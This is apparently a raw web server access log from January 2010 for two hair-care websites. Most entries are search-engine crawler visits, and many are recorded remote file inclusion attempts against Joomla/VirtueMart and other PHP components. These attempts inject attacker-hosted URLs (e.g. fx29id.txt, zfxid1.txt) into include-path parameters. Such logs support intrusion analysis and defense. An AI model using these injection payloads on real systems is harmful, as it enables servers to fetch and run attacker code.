65.23.156.168 - - [12/Jan/2010:14:11:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:14:24:57 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:14:24:57 -0800] "GET /logs/access_091005.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.249 - - [12/Jan/2010:14:26:22 -0800] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
216.129.119.12 - - [12/Jan/2010:14:26:35 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12093 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
200.115.173.228 - - [12/Jan/2010:14:33:09 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:14:33:09 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:14:33:09 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.116.46.42 - - [12/Jan/2010:14:33:39 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.116.46.42 - - [12/Jan/2010:14:33:39 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.116.46.42 - - [12/Jan/2010:14:33:39 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.61.164.141 - - [12/Jan/2010:14:35:01 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13319 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:14:35:39 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:14:35:39 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:14:35:39 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.55.51.32 - - [12/Jan/2010:14:36:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.freehairsecrets.com"
65.55.51.32 - - [12/Jan/2010:14:36:09 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13050 HTTP/1.1" 200 349 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.freehairsecrets.com"
208.116.46.42 - - [12/Jan/2010:14:38:31 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.116.46.42 - - [12/Jan/2010:14:38:31 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.116.46.42 - - [12/Jan/2010:14:38:31 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [12/Jan/2010:14:40:07 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
200.101.70.1 - - [12/Jan/2010:14:42:36 -0800] "GET /logs/access_091130.log//include/write.php?dir=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.18.192.91 - - [12/Jan/2010:14:43:25 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://ppkiajember.com/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.18.192.91 - - [12/Jan/2010:14:43:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ppkiajember.com/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.18.192.91 - - [12/Jan/2010:14:43:25 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://ppkiajember.com/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.207.6.170 - - [12/Jan/2010:14:49:18 -0800] "GET /logs/access_090629.log HTTP/1.0" 404 - "http://www.freehairsecrets.com/logs/access_090629.log" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)" "www.freehairsecrets.com"
91.207.6.170 - - [12/Jan/2010:14:49:18 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)" "www.freehairsecrets.com"
67.195.115.187 - - [12/Jan/2010:14:51:32 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.115.187 - - [12/Jan/2010:14:51:33 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2402 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:04:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:04:25 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9432 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:04:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:05:02 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12869 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:05:03 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7345 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:05:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:05:47 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14990 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:05:50 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13763 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:04 -0800] "GET /freehairsecretsphp/viewtopic.php?p=8192 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:07 -0800] "GET /freehairsecretsphp/viewtopic.php?p=20465 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:10 -0800] "GET /freehairsecretsphp/viewtopic.php?p=19780 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:13 -0800] "GET /freehairsecretsphp/viewtopic.php?p=19043 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:18 -0800] "GET /freehairsecretsphp/viewtopic.php?p=921 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:27 -0800] "GET /freehairsecretsphp/viewtopic.php?p=906 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:29 -0800] "GET /freehairsecretsphp/viewtopic.php?p=8228 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:32 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7697 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:36 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6110 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:06:38 -0800] "GET /freehairsecretsphp/viewtopic.php?p=19012 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
65.23.156.168 - - [12/Jan/2010:15:13:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:13:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:13:24 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.115.6.16 - - [12/Jan/2010:15:13:36 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:14:29 -0800] "GET /logs/access_091005.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:14:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:14:31 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:14:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:15:52 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:17:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:17:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:15:17:40 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.80.93.71 - - [12/Jan/2010:15:18:32 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
114.80.93.71 - - [12/Jan/2010:15:18:32 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:09 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:09 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:53 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:59 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:59 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.67.244.57 - - [12/Jan/2010:15:26:59 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki3.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.115.6.13 - - [12/Jan/2010:15:28:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:15:28:54 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:28:57 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18966 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:29:05 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12874 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:29:09 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9845 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:29:17 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6472 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:34:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:34:43 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15183 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:34:46 -0800] "GET /freehairsecretsphp/viewtopic.php?p=20450 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:34:48 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13796 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:15:34:50 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6084 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
69.16.230.82 - - [12/Jan/2010:15:36:14 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.16.230.82 - - [12/Jan/2010:15:36:14 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.16.230.82 - - [12/Jan/2010:15:36:14 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.61.164.139 - - [12/Jan/2010:15:39:46 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
58.61.164.40 - - [12/Jan/2010:15:41:31 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:15:49:01 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:15:49:01 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:15:49:01 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:50:32 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:50:32 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:50:32 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.115.1.8 - - [12/Jan/2010:15:51:33 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
220.181.94.213 - - [12/Jan/2010:15:51:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
220.181.94.213 - - [12/Jan/2010:15:51:54 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13995 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
82.77.23.23 - - [12/Jan/2010:15:52:51 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.77.23.23 - - [12/Jan/2010:15:52:51 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.77.23.23 - - [12/Jan/2010:15:52:51 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.83.241.105 - - [12/Jan/2010:15:53:44 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.83.241.105 - - [12/Jan/2010:15:53:44 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.83.241.105 - - [12/Jan/2010:15:53:44 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:53:53 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:53:53 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:53:53 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:15:54:05 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:15:54:05 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:15:54:05 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.249 - - [12/Jan/2010:15:55:15 -0800] "GET /logs/access_091012.log HTTP/1.0" 200 766310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
82.77.23.23 - - [12/Jan/2010:15:55:26 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.77.23.23 - - [12/Jan/2010:15:55:26 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
